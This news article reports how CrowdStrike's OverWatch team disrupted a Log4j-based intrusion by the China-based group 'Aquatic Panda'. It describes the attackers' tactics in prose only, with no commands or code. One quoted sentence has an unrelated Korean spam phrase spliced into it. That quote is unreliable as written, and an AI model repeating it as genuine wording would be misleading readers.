Cybersecurity firm CrowdStrike says its threat hunters identified and disrupted an attack by a state-sponsored group based in China, which involved an exploit of the vulnerability in Apache Log4j.
CrowdStrike said today that threat hunters on its Falcon OverWatch team intervened to help protect a “large academic institution,” which wasn’t identified, from a hands-on-keyboard attack that appears to have used a modified Log4j exploit. The China-based group has been dubbed “Aquatic Panda” by CrowdStrike, and has likely been operating since mid-2020 but had previously not been identified publicly, according to the company.
“As OverWatch disrupted the attack before Aquatic Panda could take action on their objectives, their exact intent is unknown,” said Param Singh, vice president of CrowdStrike OverWatch, in an email to VentureBeat. “This adversary, however, is known to use tools to maintain persistence in environments so they can gain access to intellectual property and other industrial trade secrets.”
According to CrowdStrike, the group sought to leverage recently disclosed flaws in Apache Log4j, a popular logging software component. Since Log4j is widely used in Java applications, defense and remediation efforts have become a major focus for security teams in recent weeks, following the disclosure of the first in a series of vulnerabilities in the software on December 9. A remote code execution (RCE) vulnerability in Log4j, known as Log4Shell, was initially disclosed on that day.
Additional vulnerabilities have been disclosed in the following weeks, with the latest coming out on Monday along with a new patch in the form of version 2.17.1 of Log4j.
Vulnerable VDI software
The exploit attempts by Aquatic Panda targeted vulnerable elements of VMware’s Horizon virtual desktop infrastructure (VDI) software, according to CrowdStrike. VMware is a major user of Java in its products, and has issued a security advisory on numerous products that have been potentially impacted by the Log4j vulnerabilities. VentureBeat has reached out to VMware for comment.
Following an advisory by VMware on December 14, CrowdStrike said that its OverWatch team began hunting for unusual processes related to VMware Horizon and the Apache Tomcat web server service.
That led the OverWatch team to observe Aquatic Panda attackers performing connectivity checks via DNS lookups and executing several Linux commands. In particular, the execution of Linux commands on a Windows host operating under Tomcat stuck out to the threat hunters at OverWatch, CrowdStrike said in a blog post today.
At that point, OverWatch provided alerts to the Falcon platform used by the victim organization and shared details directly with the organization’s security team as well, according to CrowdStrike.
Malicious activities
Additional malicious activities by Aquatic Panda observed by OverWatch included reconnaissance to understand privilege levels and system/domain details; an attempt to block an endpoint detection and response (EDR) service; downloading of additional scripts and execution of commands using PowerShell to retrieve malware; retrieval of files that most likely constituted a reverse shell; and attempts at harvesting credentials.
In terms of credential harvesting, the OverWatch team observed Aquatic Panda making repeated attempts through dumping the memory of the Local Security Authority Subsystem Service (LSASS) process using “living-off-the-land” binaries, CrowdStrike said in its blog post.
OverWatch’s efforts to track the group and provide updates to the victim organization enabled quick implementation of the organization’s incident response protocol and containment of the threat actor, which was followed by patching of the vulnerable application, according to CrowdStrike.
The response ultimately prevented the group from achieving their objectives, Singh said.
Intelligence collection
CrowdStrike says it has been tracking Aquatic Panda since May 2020. The company previously released several reports on the group to subscribers to its Intelligence service, prior to this public disclosure about the group, CrowdStrike said.
In the blog post today, CrowdStrike described the group as a “China-based targeted intrusion adversary with a dual mission of 안전놀이터 intelligence collection and industrial espionage.”
Aquatic Panda operations have mainly focused on companies in telecommunications, technology, and government in the past, according to CrowdStrike. The group is a heavy user of the Cobalt Strike remote access tool, and has been observed using a unique Cobalt Strike downloader that has been tracked as “FishMaster,” CrowdStrike said. Aquatic Panda has also used another remote access tool, njRAT, in the past, according to the company.
Many enterprise applications and cloud services written in Java are potentially vulnerable to the flaws in Log4j, prior to version 2.17.1 of the open source logging library. Log4j believed to be used in some form — either directly or indirectly by leveraging a Java framework — by the majority of large organizations.
Earlier this month, Microsoft had disclosed it has observed activity from nation-state groups — tied to countries including China — seeking to exploit the Log4j vulnerability. Microsoft, a CrowdStrike rival, also reported observing Log4Shell-related activities by threat actors connected to Iran, North Korea, and Turkey.
Additionally, cyber firm Mandiant has reported observing Log4Shell activity by state-sponsored threat actors tied to China and Iran.